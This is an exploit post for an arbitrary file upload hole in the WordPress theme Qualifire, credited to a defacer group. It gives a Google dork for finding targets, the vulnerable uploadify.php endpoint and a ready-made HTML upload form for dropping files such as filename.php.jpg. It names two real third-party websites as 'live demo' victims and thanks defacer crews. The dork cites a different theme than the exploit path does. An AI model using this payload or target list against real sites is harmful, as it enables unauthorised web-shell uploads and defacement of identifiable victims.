################################################################################# # Exploit Title : Wordpress Themes Qualifire File Upload Vulnerability | CSRF # Author : Berandal # Google Dork: inurl:/wp-content/themes/theagency # Tested on: Win 7, Linux # Blog : http://www.maxteroit.com/ # Video Proof : https://www.youtube.com/watch?v=RsVsn6OOkic ################################################################################# +-+-+-+-+-+-+-+-+ |B|e|r|a|n|d|a|l| +-+-+-+-+-+-+-+-+ # [!] Exploit : http://127.0.0.1/wordpress/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php # [!] File Location : http://127.0.0.1/[path]/filename.php.jpg ################################################################################# # [*] CSRF: ################################################################################# <html> <body> <form action="http://127.0.0.1/wordpress/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="Filedata" ><br> <input type="submit" name="submit" value="Submit"> </form> </body> </html> ################################################################################# # [*] Live Demo: ################################################################################# # http://inwentech.pl/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php # http://pinnaclefinancial.com.au/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php ################################################################################# # [*] ABOUT: ################################################################################# # Facebook: https://www.facebook.com/owlsquad.id # Twitter: https://www.twitter.com/id_berandal # Greetz : OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer #################################################################################